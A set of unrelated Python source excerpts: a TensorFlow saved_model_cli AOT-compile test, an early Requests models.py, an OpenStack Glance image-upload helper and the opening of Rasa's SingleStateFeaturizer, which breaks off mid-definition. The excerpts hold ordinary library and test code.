class AOTCompileDummyModel(tracking.AutoTrackable):
"""Model compatible with XLA compilation."""
def __init__(self):
self.var = variables.Variable(1.0, name='my_var')
self.write_var = variables.Variable(1.0, name='write_var')
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=(2, 2), dtype=dtypes.float32),
# Test unused inputs.
tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32),
])
def func2(self, x, y):
del y
return {'res': x + self.var}
@def_function.function(input_signature=[
# Test large inputs.
tensor_spec.TensorSpec(shape=(2048, 16), dtype=dtypes.float32),
tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32),
])
def func3(self, x, y):
del y
return {'res': x + self.var}
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32),
tensor_spec.TensorSpec(shape=(), dtype=dtypes.float32),
])
def func_write(self, x, y):
del y
self.write_var.assign(x + self.var)
return {'res': self.write_var}
@parameterized.named_parameters(
('VariablesToFeedNone', '', 'func2', None),
('VariablesToFeedNoneTargetAarch64Linux', '', 'func2',
'aarch64-none-linux-gnu'),
('VariablesToFeedNoneTargetAarch64Android', '', 'func2',
'aarch64-none-android'),
('VariablesToFeedAll', 'all', 'func2', None),
('VariablesToFeedMyVar', 'my_var', 'func2', None),
('VariablesToFeedNoneLargeConstant', '', 'func3', None),
('WriteToWriteVar', 'all', 'func_write', None),
)
def testAOTCompileCPUFreezesAndCompiles(
self, variables_to_feed, func, target_triple):
if not test.is_built_with_xla():
self.skipTest('Skipping test because XLA is not compiled in.')
saved_model_dir = os.path.join(test.get_temp_dir(), 'dummy_model')
dummy_model = self.AOTCompileDummyModel()
func = getattr(dummy_model, func)
with self.cached_session():
self.evaluate(dummy_model.var.initializer)
self.evaluate(dummy_model.write_var.initializer)
save.save(dummy_model, saved_model_dir, signatures={'func': func})
self.parser = saved_model_cli.create_parser()
output_prefix = os.path.join(test.get_temp_dir(), 'aot_compile_cpu_dir/out')
args = [ # Use the default seving signature_key.
'aot_compile_cpu', '--dir', saved_model_dir, '--tag_set', 'serve',
'--signature_def_key', 'func', '--output_prefix', output_prefix,
'--variables_to_feed', variables_to_feed, '--cpp_class', 'Generated'
]
if target_triple:
args.extend(['--target_triple', target_triple])
args = self.parser.parse_args(args)
with test.mock.patch.object(logging, 'warn') as captured_warn:
saved_model_cli.aot_compile_cpu(args)
self.assertRegex(
str(captured_warn.call_args),
'Signature input key \'y\'.*has been pruned while freezing the graph.')
self.assertTrue(file_io.file_exists('{}.o'.format(output_prefix)))
self.assertTrue(file_io.file_exists('{}.h'.format(output_prefix)))
self.assertTrue(file_io.file_exists('{}_metadata.o'.format(output_prefix)))
self.assertTrue(
file_io.file_exists('{}_makefile.inc'.format(output_prefix)))
header_contents = file_io.read_file_to_string('{}.h'.format(output_prefix))
self.assertIn('class Generated', header_contents)
self.assertIn('arg_feed_x_data', header_contents)
self.assertIn('result_fetch_res_data', header_contents)
# arg_y got filtered out as it's not used by the output.
self.assertNotIn('arg_feed_y_data', header_contents)
if variables_to_feed:
# Read-only-variables' setters preserve constness.
self.assertIn('set_var_param_my_var_data(const float', header_contents)
self.assertNotIn('set_var_param_my_var_data(float', header_contents)
if func == dummy_model.func_write:
# Writeable variables setters do not preserve constness.
self.assertIn('set_var_param_write_var_data(float', header_contents)
self.assertNotIn('set_var_param_write_var_data(const float',
header_contents)
makefile_contents = file_io.read_file_to_string(
'{}_makefile.inc'.format(output_prefix))
self.assertIn('-D_GLIBCXX_USE_CXX11_ABI=', makefile_contents)
if __name__ == '__main__':
test.main()
| |
# -*- coding: utf-8 -*-
"""
requests.models
~~~~~~~~~~~~~~~
This module contains the primary objects that power Requests.
"""
import json
import os
from datetime import datetime
from .hooks import dispatch_hook, HOOKS
from .structures import CaseInsensitiveDict
from .status_codes import codes
from .auth import HTTPBasicAuth, HTTPProxyAuth
from .cookies import cookiejar_from_dict, extract_cookies_to_jar, get_cookie_header
from .packages.urllib3.exceptions import MaxRetryError, LocationParseError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3 import connectionpool, poolmanager
from .packages.urllib3.filepost import encode_multipart_formdata
from .defaults import SCHEMAS
from .exceptions import (
ConnectionError, HTTPError, RequestException, Timeout, TooManyRedirects,
URLRequired, SSLError, MissingSchema, InvalidSchema, InvalidURL)
from .utils import (
get_encoding_from_headers, stream_untransfer, guess_filename, requote_uri,
stream_decode_response_unicode, get_netrc_auth, get_environ_proxies,
DEFAULT_CA_BUNDLE_PATH)
from .compat import (
cookielib, urlparse, urlunparse, urljoin, urlsplit, urlencode, str, bytes,
StringIO, is_py2)
# Import chardet if it is available.
try:
import chardet
# hush pyflakes
chardet
except ImportError:
chardet = None
REDIRECT_STATI = (codes.moved, codes.found, codes.other, codes.temporary_moved)
CONTENT_CHUNK_SIZE = 10 * 1024
class Request(object):
"""The :class:`Request <Request>` object. It carries out all functionality of
Requests. Recommended interface is with the Requests functions.
"""
def __init__(self,
url=None,
headers=dict(),
files=None,
method=None,
data=dict(),
params=dict(),
auth=None,
cookies=None,
timeout=None,
redirect=False,
allow_redirects=False,
proxies=None,
hooks=None,
config=None,
prefetch=False,
_poolmanager=None,
verify=None,
session=None,
cert=None):
#: Dictionary of configurations for this request.
self.config = dict(config or [])
#: Float describes the timeout of the request.
# (Use socket.setdefaulttimeout() as fallback)
self.timeout = timeout
#: Request URL.
self.url = url
#: Dictionary of HTTP Headers to attach to the :class:`Request <Request>`.
self.headers = dict(headers or [])
#: Dictionary of files to multipart upload (``{filename: content}``).
self.files = None
#: HTTP Method to use.
self.method = method
#: Dictionary, bytes or file stream of request body data to attach to the
#: :class:`Request <Request>`.
self.data = None
#: Dictionary or byte of querystring data to attach to the
#: :class:`Request <Request>`. The dictionary values can be lists for representing
#: multivalued query parameters.
self.params = None
#: True if :class:`Request <Request>` is part of a redirect chain (disables history
#: and HTTPError storage).
self.redirect = redirect
#: Set to True if full redirects are allowed (e.g. re-POST-ing of data at new ``Location``)
self.allow_redirects = allow_redirects
# Dictionary mapping protocol to the URL of the proxy (e.g. {'http': 'foo.bar:3128'})
self.proxies = dict(proxies or [])
# If no proxies are given, allow configuration by environment variables
# HTTP_PROXY and HTTPS_PROXY.
if not self.proxies and self.config.get('trust_env'):
self.proxies = get_environ_proxies()
self.data = data
self.params = params
self.files = files
#: :class:`Response <Response>` instance, containing
#: content and metadata of HTTP Response, once :attr:`sent <send>`.
self.response = Response()
#: Authentication tuple or object to attach to :class:`Request <Request>`.
self.auth = auth
#: CookieJar to attach to :class:`Request <Request>`.
if isinstance(cookies, cookielib.CookieJar):
self.cookies = cookies
else:
self.cookies = cookiejar_from_dict(cookies)
#: True if Request has been sent.
self.sent = False
#: Event-handling hooks.
self.hooks = {}
for event in HOOKS:
self.hooks[event] = []
hooks = hooks or {}
for (k, v) in list(hooks.items()):
self.register_hook(event=k, hook=v)
#: Session.
self.session = session
#: SSL Verification.
self.verify = verify
#: SSL Certificate
self.cert = cert
#: Prefetch response content
self.prefetch = prefetch
if headers:
headers = CaseInsensitiveDict(self.headers)
else:
headers = CaseInsensitiveDict()
# Add configured base headers.
for (k, v) in list(self.config.get('base_headers', {}).items()):
if k not in headers:
headers[k] = v
self.headers = headers
self._poolmanager = _poolmanager
def __repr__(self):
return '<Request [%s]>' % (self.method)
def _build_response(self, resp):
"""Build internal :class:`Response <Response>` object
from given response.
"""
def build(resp):
response = Response()
# Pass settings over.
response.config = self.config
if resp:
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', None))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
# Add new cookies from the server. Don't if configured not to
if self.config.get('store_cookies'):
extract_cookies_to_jar(self.cookies, self, resp)
# Save cookies in Response.
response.cookies = self.cookies
# Save cookies in Session.
for cookie in self.cookies:
self.session.cookies.set_cookie(cookie)
# No exceptions were harmed in the making of this request.
response.error = getattr(resp, 'error', None)
# Save original response for later.
response.raw = resp
if isinstance(self.full_url, bytes):
response.url = self.full_url.decode('utf-8')
else:
response.url = self.full_url
return response
history = []
r = build(resp)
if r.status_code in REDIRECT_STATI and not self.redirect:
while (('location' in r.headers) and
((r.status_code is codes.see_other) or (self.allow_redirects))):
r.content # Consume socket so it can be released
if not len(history) < self.config.get('max_redirects'):
raise TooManyRedirects()
# Release the connection back into the pool.
r.raw.release_conn()
history.append(r)
url = r.headers['location']
data = self.data
files = self.files
# Handle redirection without scheme (see: RFC 1808 Section 4)
if url.startswith('//'):
parsed_rurl = urlparse(r.url)
url = '%s:%s' % (parsed_rurl.scheme, url)
# Facilitate non-RFC2616-compliant 'location' headers
# (e.g. '/path/to/resource' instead of 'http://domain.tld/path/to/resource')
if not urlparse(url).netloc:
url = urljoin(r.url,
# Compliant with RFC3986, we percent
# encode the url.
requote_uri(url))
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.4
if r.status_code is codes.see_other:
method = 'GET'
data = None
files = None
else:
method = self.method
# Do what the browsers do if strict_mode is off...
if (not self.config.get('strict_mode')):
if r.status_code in (codes.moved, codes.found) and self.method == 'POST':
method = 'GET'
data = None
files = None
if (r.status_code == 303) and self.method != 'HEAD':
method = 'GET'
data = None
files = None
# Remove the cookie headers that were sent.
headers = self.headers
try:
del headers['Cookie']
except KeyError:
pass
request = Request(
url=url,
headers=headers,
files=files,
method=method,
params=self.session.params,
auth=self.auth,
cookies=self.cookies,
redirect=True,
data=data,
config=self.config,
timeout=self.timeout,
_poolmanager=self._poolmanager,
proxies=self.proxies,
verify=self.verify,
session=self.session,
cert=self.cert
)
request.send()
r = request.response
r.history = history
self.response = r
self.response.request = self
@staticmethod
def _encode_params(data):
"""Encode parameters in a piece of data.
Will successfully encode parameters when passed as a dict or a list of
2-tuples. Order is retained if data is a list of 2-tuples but abritrary
if parameters are supplied as a dict.
"""
if isinstance(data, bytes):
return data
if isinstance(data, str):
return data
elif hasattr(data, 'read'):
return data
elif hasattr(data, '__iter__'):
try:
dict(data)
except ValueError:
raise ValueError('Unable to encode lists with elements that are not 2-tuples.')
params = list(data.items() if isinstance(data, dict) else data)
result = []
for k, vs in params:
for v in isinstance(vs, list) and vs or [vs]:
result.append(
(k.encode('utf-8') if isinstance(k, str) else k,
v.encode('utf-8') if isinstance(v, str) else v))
return urlencode(result, doseq=True)
else:
return data
def _encode_files(self, files):
if (not files) or isinstance(self.data, str):
return None
try:
fields = self.data.copy()
except AttributeError:
fields = dict(self.data)
for (k, v) in list(files.items()):
# support for explicit filename
if isinstance(v, (tuple, list)):
fn, fp = v
else:
fn = guess_filename(v) or k
fp = v
if isinstance(fp, (bytes, str)):
fp = StringIO(fp)
fields.update({k: (fn, fp.read())})
(body, content_type) = encode_multipart_formdata(fields)
return (body, content_type)
@property
def full_url(self):
"""Build the actual URL to use."""
if not self.url:
raise URLRequired()
url = self.url
# Support for unicode domain names and paths.
scheme, netloc, path, params, query, fragment = urlparse(url)
if not scheme:
raise MissingSchema("Invalid URL %r: No schema supplied" % url)
if not scheme in SCHEMAS:
raise InvalidSchema("Invalid scheme %r" % scheme)
netloc = netloc.encode('idna').decode('utf-8')
if not path:
path = '/'
if is_py2:
if isinstance(scheme, str):
scheme = scheme.encode('utf-8')
if isinstance(netloc, str):
netloc = netloc.encode('utf-8')
if isinstance(path, str):
path = path.encode('utf-8')
if isinstance(params, str):
params = params.encode('utf-8')
if isinstance(query, str):
query = query.encode('utf-8')
if isinstance(fragment, str):
fragment = fragment.encode('utf-8')
url = (urlunparse([scheme, netloc, path, params, query, fragment]))
enc_params = self._encode_params(self.params)
if enc_params:
if urlparse(url).query:
url = '%s&%s' % (url, enc_params)
else:
url = '%s?%s' % (url, enc_params)
if self.config.get('encode_uri', True):
url = requote_uri(url)
return url
@property
def path_url(self):
"""Build the path URL to use."""
url = []
p = urlsplit(self.full_url)
# Proxies use full URLs.
if p.scheme in self.proxies:
return self.full_url
path = p.path
if not path:
path = '/'
url.append(path)
query = p.query
if query:
url.append('?')
url.append(query)
return ''.join(url)
def register_hook(self, event, hook):
"""Properly register a hook."""
self.hooks[event].append(hook)
def deregister_hook(self, event, hook):
"""Deregister a previously registered hook.
Returns True if the hook existed, False if not.
"""
try:
self.hooks[event].remove(hook)
return True
except ValueError:
return False
def send(self, anyway=False, prefetch=False):
"""Sends the request. Returns True if successful, False if not.
If there was an HTTPError during transmission,
self.response.status_code will contain the HTTPError code.
Once a request is successfully sent, `sent` will equal True.
:param anyway: If True, request will be sent, even if it has
already been sent.
"""
# Build the URL
url = self.full_url
# Pre-request hook.
r = dispatch_hook('pre_request', self.hooks, self)
self.__dict__.update(r.__dict__)
# Logging
if self.config.get('verbose'):
self.config.get('verbose').write('%s %s %s\n' % (
datetime.now().isoformat(), self.method, url
))
# Nottin' on you.
body = None
content_type = None
# Use .netrc auth if none was provided.
if not self.auth and self.config.get('trust_env'):
self.auth = get_netrc_auth(url)
if self.auth:
if isinstance(self.auth, tuple) and len(self.auth) == 2:
# special-case basic HTTP auth
self.auth = HTTPBasicAuth(*self.auth)
# Allow auth to make its changes.
r = self.auth(self)
# Update self to reflect the auth changes.
self.__dict__.update(r.__dict__)
# Multi-part file uploads.
if self.files:
(body, content_type) = self._encode_files(self.files)
else:
if self.data:
body = self._encode_params(self.data)
if isinstance(self.data, str) or hasattr(self.data, 'read'):
content_type = None
else:
content_type = 'application/x-www-form-urlencoded'
# Add content-type if it wasn't explicitly provided.
if (content_type) and (not 'content-type' in self.headers):
self.headers['Content-Type'] = content_type
_p = urlparse(url)
no_proxy = filter(lambda x:x.strip(), self.proxies.get('no', '').split(','))
proxy = self.proxies.get(_p.scheme)
if proxy and not any(map(_p.netloc.endswith, no_proxy)):
conn = poolmanager.proxy_from_url(proxy)
_proxy = urlparse(proxy)
if '@' in _proxy.netloc:
auth, url = _proxy.netloc.split('@', 1)
self.proxy_auth = HTTPProxyAuth(*auth.split(':', 1))
r = self.proxy_auth(self)
self.__dict__.update(r.__dict__)
else:
# Check to see if keep_alive is allowed.
try:
if self.config.get('keep_alive'):
conn = self._poolmanager.connection_from_url(url)
else:
conn = connectionpool.connection_from_url(url)
self.headers['Connection'] = 'close'
except LocationParseError as e:
raise InvalidURL(e)
if url.startswith('https') and self.verify:
cert_loc = None
# Allow self-specified cert location.
if self.verify is not True:
cert_loc = self.verify
# Look for configuration.
if not cert_loc and self.config.get('trust_env'):
cert_loc = os.environ.get('REQUESTS_CA_BUNDLE')
# Curl compatibility.
if not cert_loc and self.config.get('trust_env'):
cert_loc = os.environ.get('CURL_CA_BUNDLE')
if not cert_loc:
cert_loc = DEFAULT_CA_BUNDLE_PATH
if not cert_loc:
raise Exception("Could not find a suitable SSL CA certificate bundle.")
conn.cert_reqs = 'CERT_REQUIRED'
conn.ca_certs = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
if self.cert and self.verify:
if len(self.cert) == 2:
conn.cert_file = self.cert[0]
conn.key_file = self.cert[1]
else:
conn.cert_file = self.cert
if not self.sent or anyway:
# Skip if 'cookie' header is explicitly set.
if 'cookie' not in self.headers:
cookie_header = get_cookie_header(self.cookies, self)
if cookie_header is not None:
self.headers['Cookie'] = cookie_header
# Pre-send hook.
r = dispatch_hook('pre_send', self.hooks, self)
self.__dict__.update(r.__dict__)
# catch urllib3 exceptions and throw Requests exceptions
try:
# Send the request.
r = conn.urlopen(
method=self.method,
url=self.path_url,
body=body,
headers=self.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=self.config.get('max_retries', 0),
timeout=self.timeout,
)
self.sent = True
except MaxRetryError as e:
raise ConnectionError(e)
except (_SSLError, _HTTPError) as e:
if self.verify and isinstance(e, _SSLError):
raise SSLError(e)
raise Timeout('Request timed out.')
# build_response can throw TooManyRedirects
self._build_response(r)
# Response manipulation hook.
self.response = dispatch_hook('response', self.hooks, self.response)
# Post-request hook.
r = dispatch_hook('post_request', self.hooks, self)
self.__dict__.update(r.__dict__)
# If prefetch is True, mark content as consumed.
if prefetch or self.prefetch:
# Save the response.
self.response.content
if self.config.get('danger_mode'):
self.response.raise_for_status()
return self.sent
class Response(object):
"""The core :class:`Response <Response>` object. All
:class:`Request <Request>` objects contain a
:class:`response <Response>` attribute, which is an instance
of this class.
"""
def __init__(self):
self._content = False
self._content_consumed = False
#: Integer Code of responded HTTP Status.
self.status_code = None
#: Case-insensitive Dictionary of Response Headers.
#: For example, ``headers['content-encoding']`` will return the
#: value of a ``'Content-Encoding'`` response header.
self.headers = CaseInsensitiveDict()
#: File-like object representation of response (for advanced usage).
self.raw = None
#: Final URL location of Response.
self.url = None
#: Resulting :class:`HTTPError` of request, if one occurred.
self.error = None
#: Encoding to decode with when accessing r.text.
self.encoding = None
#: A list of :class:`Response <Response>` objects from
#: the history of the Request. Any redirect responses will end
#: up here.
self.history = []
#: The :class:`Request <Request>` that created the Response.
self.request = None
#: A CookieJar of Cookies the server sent back.
self.cookies = None
#: Dictionary of configurations for this request.
self.config = {}
def __repr__(self):
return '<Response [%s]>' % (self.status_code)
def __bool__(self):
"""Returns true if :attr:`status_code` is 'OK'."""
return self.ok
def __nonzero__(self):
"""Returns true if :attr:`status_code` is 'OK'."""
return self.ok
@property
def ok(self):
try:
self.raise_for_status()
except RequestException:
return False
return True
def iter_content(self, chunk_size=1, decode_unicode=False):
"""Iterates over the response data. This avoids reading the content
at once into memory for large responses. The chunk size is the number
of bytes it should read into memory. This is not necessarily the
length of each item returned as decoding can take place.
"""
if self._content_consumed:
raise RuntimeError(
'The content for this response was already consumed'
)
def generate():
while 1:
chunk = self.raw.read(chunk_size)
if not chunk:
break
yield chunk
self._content_consumed = True
gen = stream_untransfer(generate(), self)
if decode_unicode:
gen = stream_decode_response_unicode(gen, self)
return gen
def iter_lines(self, chunk_size=10 * 1024, decode_unicode=None):
"""Iterates over the response data, one line at a time. This
avoids reading the content at once into memory for large
responses.
"""
pending = None
for chunk in self.iter_content(
chunk_size=chunk_size,
decode_unicode=decode_unicode):
if pending is not None:
chunk = pending + chunk
lines = chunk.splitlines()
if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]:
pending = lines.pop()
else:
pending = None
for line in lines:
yield line
if pending is not None:
yield pending
@property
def content(self):
"""Content of the response, in bytes."""
if self._content is False:
# Read the contents.
try:
if self._content_consumed:
raise RuntimeError(
'The content for this response was already consumed')
if self.status_code is 0:
self._content = None
else:
self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes()
except AttributeError:
self._content = None
self._content_consumed = True
return self._content
@property
def text(self):
"""Content of the response, in unicode.
if Response.encoding is None and chardet module is available, encoding
will be guessed.
"""
# Try charset from content-type
content = None
encoding = self.encoding
if not self.content:
return str('')
# Fallback to auto-detected encoding.
if self.encoding is None:
if chardet is not None:
encoding = chardet.detect(self.content)['encoding']
# Decode unicode from given encoding.
try:
content = str(self.content, encoding, errors='replace')
except LookupError:
# A LookupError is raised if the encoding was not found which could
# indicate a misspelling or similar mistake.
#
# So we try blindly encoding.
content = str(self.content, errors='replace')
return content
@property
def json(self):
"""Returns the json-encoded content of a request, if any."""
try:
return json.loads(self.text or self.content)
except ValueError:
return None
def raise_for_status(self, allow_redirects=True):
"""Raises stored :class:`HTTPError` or :class:`URLError`, if one occurred."""
if self.error:
raise self.error
if (self.status_code >= 300) and (self.status_code < 400) and not allow_redirects:
http_error = HTTPError('%s Redirection' % self.status_code)
http_error.response = self
raise http_error
elif (self.status_code >= 400) and (self.status_code < 500):
http_error = HTTPError('%s Client Error' % self.status_code)
http_error.response = self
raise http_error
elif (self.status_code >= 500) and (self.status_code < 600):
http_error = HTTPError('%s Server Error' % self.status_code)
http_error.response = self
raise http_error
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
import webob.exc
from glance.common import exception
from glance.openstack.common import excutils
from glance.common import utils
import glance.convertor
import glance.db
import glance.openstack.common.log as logging
import glance.registry.client.v1.api as registry
import glance.store
CONF = cfg.CONF
CONF.import_opt('convert_image_to_raw', 'glance.convertor')
LOG = logging.getLogger(__name__)
def initiate_deletion(req, location, id, delayed_delete=False):
"""
Deletes image data from the backend store.
:param req: The WSGI/Webob Request object
:param location: URL to the image data in a data store
:param image_id: Opaque image identifier
:param delayed_delete: whether data deletion will be delayed
"""
if delayed_delete:
glance.store.schedule_delayed_delete_from_backend(req.context,
location, id)
else:
glance.store.safe_delete_from_backend(req.context, location, id)
def _kill(req, image_id):
"""
Marks the image status to `killed`.
:param req: The WSGI/Webob Request object
:param image_id: Opaque image identifier
"""
registry.update_image_metadata(req.context, image_id,
{'status': 'killed'})
def safe_kill(req, image_id):
"""
Mark image killed without raising exceptions if it fails.
Since _kill is meant to be called from exceptions handlers, it should
not raise itself, rather it should just log its error.
:param req: The WSGI/Webob Request object
:param image_id: Opaque image identifier
"""
try:
_kill(req, image_id)
except Exception as e:
LOG.exception(_("Unable to kill image %(id)s: ") % {'id': image_id})
def upload_data_to_store(req, image_meta, image_data, store, notifier):
"""
Upload image data to specified store.
Upload image data to the store and cleans up on error.
"""
image_id = image_meta['id']
db_api = glance.db.get_api()
image_size = image_meta.get('size', None)
try:
remaining = glance.api.common.check_quota(
req.context, image_size, db_api, image_id=image_id)
if remaining is not None:
image_data = utils.LimitingReader(image_data, remaining)
if CONF.convert_image_to_raw and \
image_meta.get('container_format', 'bare') == 'bare':
image_data, new_size = glance.convertor.convert(
utils.CooperativeReader(image_data))
image_meta['size'] = new_size
# NOTE(sileht): disable checksum check
# the V2 API doesn't check that, so...
image_meta['checksum'] = None
(location,
size,
checksum,
locations_metadata) = glance.store.store_add_to_backend(
image_meta['id'],
utils.CooperativeReader(image_data),
image_meta['size'],
store)
try:
# recheck the quota in case there were simultaneous uploads that
# did not provide the size
glance.api.common.check_quota(
req.context, size, db_api, image_id=image_id)
except exception.StorageQuotaFull:
LOG.info(_('Cleaning up %s after exceeding the quota %s')
% image_id)
glance.store.safe_delete_from_backend(
location, req.context, image_meta['id'])
raise
def _kill_mismatched(image_meta, attr, actual):
supplied = image_meta.get(attr)
if supplied and supplied != actual:
msg = _("Supplied %(attr)s (%(supplied)s) and "
"%(attr)s generated from uploaded image "
"(%(actual)s) did not match. Setting image "
"status to 'killed'.") % locals()
LOG.error(msg)
safe_kill(req, image_id)
initiate_deletion(req, location, image_id, CONF.delayed_delete)
raise webob.exc.HTTPBadRequest(explanation=msg,
content_type="text/plain",
request=req)
# Verify any supplied size/checksum value matches size/checksum
# returned from store when adding image
_kill_mismatched(image_meta, 'size', size)
_kill_mismatched(image_meta, 'checksum', checksum)
# Update the database with the checksum returned
# from the backend store
LOG.debug(_("Updating image %(image_id)s data. "
"Checksum set to %(checksum)s, size set "
"to %(size)d"), locals())
update_data = {'checksum': checksum,
'size': size}
if CONF.convert_image_to_raw and \
image_meta.get('container_format', 'bare') == 'bare':
update_data['disk_format'] = 'raw'
try:
image_meta = registry.update_image_metadata(req.context,
image_id,
update_data)
except exception.NotFound as e:
msg = _("Image %s could not be found after upload. The image may "
"have been deleted during the upload.") % image_id
LOG.info(msg)
# NOTE(jculp): we need to clean up the datastore if an image
# resource is deleted while the image data is being uploaded
#
# We get "location" from above call to store.add(), any
# exceptions that occur there handle this same issue internally,
# Since this is store-agnostic, should apply to all stores.
initiate_deletion(req, location, image_id, CONF.delayed_delete)
raise webob.exc.HTTPPreconditionFailed(explanation=msg,
request=req,
content_type='text/plain')
except exception.Duplicate as e:
msg = _("Attempt to upload duplicate image: %s") % e
LOG.debug(msg)
safe_kill(req, image_id)
notifier.error('image.upload', msg)
raise webob.exc.HTTPConflict(explanation=msg,
request=req,
content_type="text/plain")
except exception.Forbidden as e:
msg = _("Forbidden upload attempt: %s") % e
LOG.debug(msg)
safe_kill(req, image_id)
notifier.error('image.upload', msg)
raise webob.exc.HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
except exception.StorageFull as e:
msg = _("Image storage media is full: %s") % e
LOG.error(msg)
safe_kill(req, image_id)
notifier.error('image.upload', msg)
raise webob.exc.HTTPRequestEntityTooLarge(explanation=msg,
request=req,
content_type='text/plain')
except exception.StorageWriteDenied as e:
msg = _("Insufficient permissions on image storage media: %s") % e
LOG.error(msg)
safe_kill(req, image_id)
notifier.error('image.upload', msg)
raise webob.exc.HTTPServiceUnavailable(explanation=msg,
request=req,
content_type='text/plain')
except exception.ImageSizeLimitExceeded as e:
msg = (_("Denying attempt to upload image larger than %d bytes.")
% CONF.image_size_cap)
LOG.info(msg)
safe_kill(req, image_id)
notifier.error('image.upload', msg)
raise webob.exc.HTTPRequestEntityTooLarge(explanation=msg,
request=req,
content_type='text/plain')
except exception.StorageQuotaFull as e:
msg = (_("Denying attempt to upload image because it exceeds the ."
"quota: %s") % e)
LOG.info(msg)
safe_kill(req, image_id)
notifier.error('image.upload', msg)
raise webob.exc.HTTPRequestEntityTooLarge(explanation=msg,
request=req,
content_type='text/plain')
except webob.exc.HTTPError:
#NOTE(bcwaldon): Ideally, we would just call 'raise' here,
# but something in the above function calls is affecting the
# exception context and we must explicitly re-raise the
# caught exception.
msg = _("Received HTTP error while uploading image %s") % image_id
notifier.error('image.upload', msg)
with excutils.save_and_reraise_exception():
LOG.exception(msg)
safe_kill(req, image_id)
except (ValueError, IOError) as e:
msg = _("Client disconnected before sending all data to backend")
LOG.debug(msg)
safe_kill(req, image_id)
raise webob.exc.HTTPBadRequest(explanation=msg,
content_type="text/plain",
request=req)
except Exception as e:
msg = _("Failed to upload image %s") % image_id
LOG.exception(msg)
safe_kill(req, image_id)
notifier.error('image.upload', msg)
raise webob.exc.HTTPInternalServerError(explanation=msg,
request=req,
content_type='text/plain')
return image_meta, location, locations_metadata
| |
import logging
import numpy as np
import scipy.sparse
from typing import List, Optional, Dict, Text, Set, Any
from rasa.core.featurizers.precomputation import MessageContainerForCoreFeaturization
from rasa.nlu.extractors.extractor import EntityTagSpec
from rasa.nlu.utils import bilou_utils
from rasa.nlu.utils.bilou_utils import BILOU_PREFIXES
from rasa.shared.core.domain import SubState, State, Domain
from rasa.shared.core.constants import PREVIOUS_ACTION, ACTIVE_LOOP, USER, SLOTS
from rasa.shared.core.trackers import is_prev_action_listen_in_state
from rasa.shared.nlu.constants import (
ENTITIES,
FEATURE_TYPE_SENTENCE,
ACTION_TEXT,
ACTION_NAME,
INTENT,
NO_ENTITY_TAG,
ENTITY_ATTRIBUTE_TYPE,
ENTITY_TAGS,
TEXT,
)
from rasa.shared.nlu.training_data.features import Features
from rasa.utils.tensorflow import model_data_utils
logger = logging.getLogger(__name__)
class SingleStateFeaturizer:
"""Base class to transform the dialogue state into an ML format.
Subclasses of SingleStateFeaturizer will decide how a bot will
transform the dialogue state into a dictionary mapping an attribute
to its features. Possible attributes are: `INTENT`, `TEXT`, `ACTION_NAME`,
`ACTION_TEXT`, `ENTITIES`, `SLOTS` and `ACTIVE_LOOP`. Each attribute will be
featurized into a list of `rasa.utils.features.Features`.
"""
def __init__(self) -> None:
"""Initialize the single state featurizer."""
self._default_feature_states = {}
self.action_texts = []
self.entity_tag_specs = []
def _create_entity_tag_specs(
self, bilou_tagging: bool = False
) -> List[EntityTagSpec]:
"""Returns the tag to index mapping for entities.
Returns:
Tag to index mapping.
"""
if ENTITIES not in self._default_feature_states:
return []
if bilou_tagging:
tag_id_index_mapping = {
f"{prefix}{tag}": idx_1 * len(BILOU_PREFIXES) + idx_2 + 1
for tag, idx_1 in self._default_feature_states[ENTITIES].items()
for idx_2, prefix in enumerate(BILOU_PREFIXES)
}
else:
tag_id_index_mapping = {
tag: idx + 1 # +1 to keep 0 for the NO_ENTITY_TAG
for tag, idx in self._default_feature_states[ENTITIES].items()
}
# NO_ENTITY_TAG corresponds to non-entity which should correspond to 0 index
# needed for correct prediction for padding
tag_id_index_mapping[NO_ENTITY_TAG] = 0
# TODO
# The entity states used to create the tag-idx-mapping contains the
# entities and the concatenated entity and roles/groups. We do not
# distinguish between entities and roles/groups right now.
# we return a list to anticipate that
return [
EntityTagSpec(
tag_name=ENTITY_ATTRIBUTE_TYPE,
tags_to_ids=tag_id_index_mapping,
ids_to_tags={value: key for key, value in tag_id_index_mapping.items()},
num_tags=len(tag_id_index_mapping),
)
]
def prepare_for_training(
self, domain: Domain, bilou_tagging: bool = False,
) -> None:
"""Gets necessary information for featurization from domain.
Args:
domain: An instance of :class:`rasa.shared.core.domain.Domain`.
bilou_tagging: indicates whether BILOU tagging should be used or not
"""
# store feature states for each attribute in order to create binary features
def convert_to_dict(feature_states: List[Text]) -> Dict[Text, int]:
return {
feature_state: idx for idx, feature_state in enumerate(feature_states)
}
self._default_feature_states[INTENT] = convert_to_dict(domain.intents)
self._default_feature_states[ACTION_NAME] = convert_to_dict(
domain.action_names_or_texts
)
self._default_feature_states[ENTITIES] = convert_to_dict(domain.entity_states)
self._default_feature_states[SLOTS] = convert_to_dict(domain.slot_states)
self._default_feature_states[ACTIVE_LOOP] = convert_to_dict(domain.form_names)
self.action_texts = domain.action_texts
self.entity_tag_specs = self._create_entity_tag_specs(bilou_tagging)
def _state_features_for_attribute(
self, sub_state: SubState, attribute: Text
